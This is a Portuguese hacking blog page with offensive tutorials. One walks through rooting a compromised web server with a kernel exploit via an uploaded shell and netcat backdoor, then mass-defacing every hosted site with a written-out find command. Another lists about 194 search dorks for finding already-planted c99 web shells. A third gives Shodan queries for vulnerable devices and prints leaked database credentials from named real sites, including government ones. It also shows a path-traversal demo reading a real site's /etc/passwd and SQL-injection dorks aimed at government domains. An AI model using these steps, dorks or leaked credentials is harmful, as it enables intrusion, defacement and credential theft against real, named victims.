Música da semana

Ha Tempos by Legião Urbana on Grooveshark

Enemy Hacking

Um mundo Hacker consciente onde você aprende com mais facilidade.

Enemy Hacking

Notícias e tutoriais em tempo real para facilitar ao aprendizado.

Enemy Hacking

Softwares totalmente gratuitos em versão Premmium.

Enemy Hacking

Junte-se a nós e faça parte de nossa equipe !

Enemy Hacking

Todos os direitos reservados 2011 ™

Mostrando postagens com marcador Defacer. Mostrar todas as postagens
Mostrando postagens com marcador Defacer. Mostrar todas as postagens

Local root e Mass deface

a escalação de privilegio e conseguir o root sem a senha. e fazer um possivel mass deface. lembrando que "mass deface" é uma tecnica que muda todas as index dos sites hospedados no mesmo servidor.
-
Primeiro de tudo vamos ver qual que é versão do kernel que o servidor esta usando neste caso é "2.6.18"



Agora o que temos que fazer é simples, vamos encontrar uma XPL para essa versão do kernel, xpl é o exploit para fazer o privilegio escalation (local root exploit) vocês podem procurar xpls em sites como exploit-db, inj3ct0r e até mesmo no google. um outro otimo site também é esse:
-
http://tarantula.by.ru/localroot/
-
agora digamos que vc ja achou a xpl para esta versão do kernel, na maioria das vezes são exploits feitos em linguagem 'C' então utilize o linux e compile com gcc, porque o windows e seus compiladores é faill. apos ter compilado a xpl upe ela pela shell que vc deve ter upada no site no qual quer rootar o servidor. apos ter upado a xpl, agora vamos instalar um backdoor no site, geralmente todas as shells ja vem com uns tool que permite instalar o backdoor..


Agora depois de instalado o backdoor vamos fazer conexão com a porta selecionada para o backdoor, para fazer a conexão podemos utilizar qualquer programa que faça a conexão com a porta, mas eu recomendo o 'netcat' vamos conectar com o netcat utilizando o comando: nc IP 5997 apos conectar com o backdoor temos que ir no diretorio no qual vc fez o upload da xpl.



agora vamos apenas executar pelo o backdoor a xpl upada, com o comando ./2.6.18 e esperar terminar a execusão da xpl, no caso esse 2.6.18 <~ é o nome da xpl upada la no site. apos terminar a execusão digite: 'id' e se foi feito com sucesso vai aparecer isso: uid=0(root) gid=0(root) groups=0(root) então isso siguinifica que vc esta como root já agora podemos fazer qualquer coisa no servidor inclusive um mass deface =P segue o tutorial para fazer o 'mass'.
-
Vamos ah um site que mostre todos os sites hospedado no mesmo servidor do site que queremos ownar. eu recomendo o:
www.onthesamehost.com eu uso ele. mas pode ser outro.
-
Agora voltamos ao backdoor e vamos upar nossa index para deface, tendo a index upado pegue o diretorio no qual ela se encontra. exemplo: /htdocs/2010/imagens/index.html agora vamos usar o seguinte comando para realizar o mass deface:
-

find /diretorios que estão os sites/ -name "index.*" -exec cp sua index upada {} \;

-

explicando: em "/diretorios que estão os sites/" vc deve colocar o diretorio no qual se encontra os sites no servidor. exemplo: "/home/sitevuln/attpd/htdocs/" <~ diretorio onde estão os sites

-
em sua index upada vc coloca o diretorio da sua index upada. exemplo: /htdocs/2010/imagens/index.html
-
E pronto mudando isso deve ficar assim:

find /home/attpd/htdocs/ -name "index.*" -exec cp /home/site/htdocs/2010/imagens/index.html {} \;

-
Agora basta executar esse comando e esperar terminar depois vá la no 'onthesamehost' e veja os sites e clique neles e veja que todas as index dos sites hospedado no mesmo servidor foram mudadas . e pronto mass concluido.

usando tool mass deface, esse tol foi feito para diminuir um pouco do trabalho... apenas upe o tool pela shell
e execute ele assim pelo backdoor. o modo de uso é:
-
usage : perl MSRml.pl <~ diretorio da sua index upada.
-
example : perl MSRml.pl /tmp/index.html <~ exemplo.

-
download do tool mas deface:
-
http://www.4shared.com/file/ib4_kI2B/massdeface.html
-
-

Video aula do Hackinho:
-
http://www.4shared.com/get/dvHGExJY/Mass_By_Hackinhompeg.html
-
Só para incrementar o tuto: XPL para a versão do kernel 2.6.18 local root '2010'
-
-
http://www.multiupload.com/YQRO5FK0T1

Créditos: TSH

Procurando por shell c99 upadas

Dica bem básica pra encontrar a famosa shell c99

Talvez alguém aqui já se viu com um site vulnerável, mas não tinha shell upada por isso teve que upar uma, pra então fazer o serviço que pretendia...

Estes dork's vão ajudar Você a encontrar uma já upada... só usar...

001.safe-mode: off (not secure) drwxrwxrwx c99shell
002.inurl:c99.txt
003.inurl:c99.php uid=0(root)
004.root c99.php
005."Captain Crunch Security Team" inurl:c99
006.download c99.php
007.inurl:c99.php
008.allinurl: c99.php
009.allinurl: c99.txt
010.inurl:"/c99.php"
011.inurl:"c99.php" c99shell
012.inurl:c99.php uid=0(root)
013.c99shell powered by admin
014.inurl:"/c99.php"
015.c99 shell v.1.0 (roots)
016.allintitle: "c99shell"
017.inurl:"c99.php
018.allinurl: "c99.php"
019.intitle:C99Shell v. 1.0 pre-release +uname
020.intitle:C99Shell v. 1.0 pre-release +uname
021.allinurl: "c99.php"
022.inurl:"c99.php"
023.inurl:"c99.php"
024.inurl:"c99.php" c99shell
025.inurl:"c99.php"
026.inurl:"/c99.php
027.inurl:c99.php?
028.inurl:/c99.php+uname
029.allinurl:"c99.php"
030.inurl:"c99.php"
031.allinurl:c99.php?
032."inurl:c99..php"
033.allinurl:c99.php
034.c99shell [file on secure ok ]?
035.inurl:c99.php
036.powered by Captain Crunch Security Team
037.allinurl:c99.php
038."c99.php" filetype:php
039.allinurl:c99.php
040.inurl:c99shell.php
041.allinurl:.c99.php
042."inurl:c99.php"
043.c99. PHP-code Feedback Self remove
044.allinurl:c99.php
045.download c99.txt
046.inurl:c99shell.txt
047.allinurl: "c99.php"
048.allinurl:c99.php
049.allinurl:c99.php
050.c99shell
051.inurl:c99.php
052.intitle:C99Shell v. 1.0 pre-release +uname
053.allinurl:"c99.php"
054.inurl:c99.php
055.safe-mode: off (not secure) drwxrwxrwx c99shell
056.inurl:/c99.php
057.inurl:"c99.php"
058.inurl:c99.php
059.c99.php download
060.inurl:"c99.php"
061.inurl:/c99.php
062.inurl:"c99.php?"
063.files/c99.php
064.c99shell filetype:php -echo
065.c99shell powered by admin
066.inurl:"c99.php"
067.inurl:c99.php uid=0(root)
068.inurl:"c99.php"
069.inurl:"/c99.php" intitle:"C99shell"
070.C99Shell v. 1.0 pre-release build #5
071.inurl:c99.php
072.inurl:c99.php
073.--[ c99shell v. 1.0 pre-release build #16
074.c99shell linux infong
075.C99Shell v. 1.0 pre-release build
076.!C99Shell v. 1.0 beta!
077.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
078.!c99shell v. 1+Safe-mode: OFF (not secure)
079."C99Shell v. 1.0 pre-release build "
080.intitle:c99shell +filetype:php
081.intitle:C99Shell v. 1.0 pre-release +uname
082."Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
083.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
084.intitle:!C99Shell v. 1.0 pre-release build #16! root
085.!C99Shell v. 1.0 pre-release build #5!
086.C99Shell v. 1.0 pre-release build #16!
087.intitle:c99shell intext:uname
088.allintext:C99Shell v. 1.0 pre-release build #12
089.c99shell v. 1.0 pre-release build #16
090.--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
091.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
092."c99shell v 1.0"
093.ftp apache inurl:c99.php
094.c99shell+v.+1.0 16
095.C99Shell v. 1.0 pre-release build #16 download
096.intitle:c99shell "Software: Apache"
097.allinurl: c99.php
098.allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
099. 
100.Logout
101.powered by Captain Crunch Security Team
102.!C99Shell v. 1.0 pre-release build #5!
103.c99shell v. 1.0 release security
104.c99shell v. 1.0 pre-release build
105.c99shell [file on secure ok ]?
106.C99Shell v. 1.3
107.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
108.inurl:c99.php uid=0(root)
109.powered by Captain Crunch Security Team
110.C99Shell v. 1.0 pre-release build #16
111.c99shell[on file]ok
112.c99shell[file on ]ok
113.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
114."C99Shell v. 1.0 pre"
115.=C99Shell v. 1.0 pre-release
116.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
117.c99shell v. pre-release build
118.inurl:c99.php c99 shell
119.inurl:c99.php c99 shell
120.powered by Captain Crunch Security Team
121.C99Shell v. 1.0 pre-release build #16!
122.C99Shell v. 1.0 pre-release build #16 administrator
123.intitle:c99shell filetype:php
124.powered by Captain Crunch Security Team
125.powered by Captain Crunch Security Team
126.C99Shell v. 1.0 pre-release build #12
127.c99shell v.1.0
128."c99shell v. 1.0 pre-release build"
129.inurl:"c99.php" filetype:php
130."c99shell v. 1.0 "
131.ok c99.php
132.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
133.c99shell v. 1.0 pre-release build #16 |
134.!C99Shell v. 1.0 pre-release build #5!
135.!C99Shell v. 1.0 pre-release build #5!
136.powered by Captain Crunch Security Team
137.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
138.powered by Captain Crunch Security Team
139.C99Shell v. 1.0 pre-release
140.inurl:c99.php ext:php
141.allinurl:"c99.php"
142.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
143.powered by Captain Crunch Security Team
144.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
145.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"
146.C99Shell v. 1.0 pre-release build #16 software apache
147.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
148."c99shell v 1.0"
149.allintitle: C99shell filetype:php
150.C99Shell v. 1.0 pre-release build #16!
151."c99shell v. 1.0 pre-release"
152.c99shell v. 1.0 pre-release build #5
153.allinurl:"c99.php" filetype:php
154.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
155.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
156.!C99Shell v. 1.0 pre-release build #16!
157.intitle:C99Shell v. 1.0 pre-release +uname
158.c99shell v. 1.0
159.--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
160.inurl:"/c99.php"
161.c99shell +uname
162.c99shell php + uname
163.c99shell php + uname
164.--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
165.!C99Shell v. 1.0 pre-release build #5!
166.C99Shell v.1.0 pre-release
167.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
168.intitle:c99shell filetype:php
169."Encoder Tools Proc. FTP brute"
170."c99" filetype:php intext:"Safe-Mode: OFF"
171.c99shell v. 1.0 pre
172.intitle:c99shell uname -bbpress
173.intitle:"index.of" c99.php
174.inurl:admin/files/
175.intitle:"index of /" "c99.php"
176.intitle:"index of" intext:c99.php
177.intitle:index.of c99.php
178.intitle:"index of" + c99.php
179.intitle:index/of file c99.php
180.intitle:index/of file c99.php
181.index of /admin/files/
182.intitle:"Index of/"+c99.php
183.c99.php "intitle:Index of "
184.c99.php "intitle:Index of "
185.c99.php "intitle:Index of "
186.intitle:index.of c99.php
187.img/c99.php
188.intitle:index.of c99.php
189.img.c99.php
190.intitle:"Index of/"+c99.php
191."index of /" c99.php
192.intitle:"Index of" c99.php
193."index of" c99.php
194."Index of/"+c99.php


é isso pessoal, Bom proveito... 

Vulnerabilidade Research

Olá a todos, neste tutorial eu vou mostrar como encontrar varias vulnerabilidades em cms, web , serviços remoto e etc... algumas coisas básicas outras avançadas no entanto tudo é vuln do mesmo jeito . Aqui neste tutorial você vai ter uma ideia de como é faicil invadir sistemas hoje .

Além do Google Hacking Database ( http://www.exploit-db.com/google-dorks/ ) e outros serviços do gênero existem varios outros serviços voltados a pesquisa de vulnerabilidades. Vou começar postando um sistema web only de buscar por vulnerabilidades muito GOOD em especial pra quem gosta de brincar com metasploit, agora vc pode passar o dia todo exploitando empresas e sites comum basta saber pesquisar, bem eu estou falando do ( SHODAN - Computer Search Engine ) www.shodanhq.com desenvolvido por
http://twitter.com/#!/achillean vamos aos exemplos de pesquisa, vc algumas vez ja encontrou um servi rodando o IIS 1.0 pelo google ? quase impossivel né, mais com o SHODAN quase todas os serviços vuln é possivel pesquisar, vejamos alguns exemplos :

http://shodan.surtri.com/?q="iis/1.0";
http://shodan.surtri.com/?q="iis/2.0";
http://shodan.surtri.com/?q="iis/3.0";
http://shodan.surtri.com/?q="iis/4.0";
Veja o resultado vai se surpreender, vamos a outros exemplos .

Aparelhos DVR com interface WEB exposta:
http://shodan.surtri.com/?q=DVR

Máquinas com busybox telnet sem senha:
http://shodan.surtri.com/?q=port%3A23+%22list+of+built-in+commands%22)

Cameras de Segurança abertas na Internet:
http://shodan.surtri.com/?q=port%3A80+%22Camera%22+%22HTTP%2F1.0+200+OK%22

Agora vc pode combinar os novas falhas e 0days que sai em sites de exploits e usar o SHODAN para pesquisar serviços vulneraveis .

Vejam algumas outros exemplos de busca postado em um site voltado a pentest

http://www.pentestit.com/shodan-queries/

Encontrando arquivos senssíveis (GOOD)

Dorks: allinurl:/conecta_mysql.inc - intext:db filetype:inc -

http://www.ezsitebuilder.com/php/db.inc

//$host = "db1.actadivina.com";
//$host = "localhost";
//$db_name = "QS_devil";
//$db_name = "Authors";

http://smlick.net/include/db.inchttp://smlick.net/include/db2.inc

$user = 'root';
$pass = 'orange';
$host = "localhost";
$db_name = 'hanc'

Olha esse aqui, qui legal, pena que pra conectar tem que tar dentro da rede interna deles, se obter acesso a algum site do mesmo servi vc pode conectar .
http://www.pge.mt.gov.br/novosite2/biblioteca/conexao.inc

$db = mysql_connect("192.168.3.80", "root", "cpdpge");

http://gaia.saude.mg.gov.br/conf_pentagrama/conf_site.inc
-
http://www.webfocobrasil.com.br/clientes/schimitt/conecta_mysql.inc
-
http://www.afp.mil.ph/Nolcom/Include/db_connect.inc

Como são varios sites eu vou por só um exemplo de dork que ja contem varios vuln no google .

d0rk: inurl:download_file.php?file= site:hr
-
demo: www.politologija.hr/download_file.php?file=../../../../../../../../../../../../etc/passwd .



Encontrando Falhas de SQL-Injection (interessante) .

Muita gente ja fez vídeos, tutoriais com novas dorks e tal, aqui eu vou mostrar somente uma que vale por todas :

inurl:*.php?id=

isso mesmo, dái vc ja pode incrementar mais especificando de qual dóminio vc quer fazer a busca, exemplos; dóminios com.br,gov.br e org e varios outros .

site:gov.br inurl:*.php?id=

Explicação : nesses exemplo, observe que ao invéis de por noticia.php?id= ou pagina.php?id= ou qualquermerda.php?id= eu simplesmente coloco um "*" isso quer dizer que pode vir qualquer coisa .

Simplesmente pesquise no google por: inurl:"search.php?q=" - inurl:"search.asp?q=" - inurl:"buscar.php?q="

daí ja da uma noção para novas dorks né ?

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More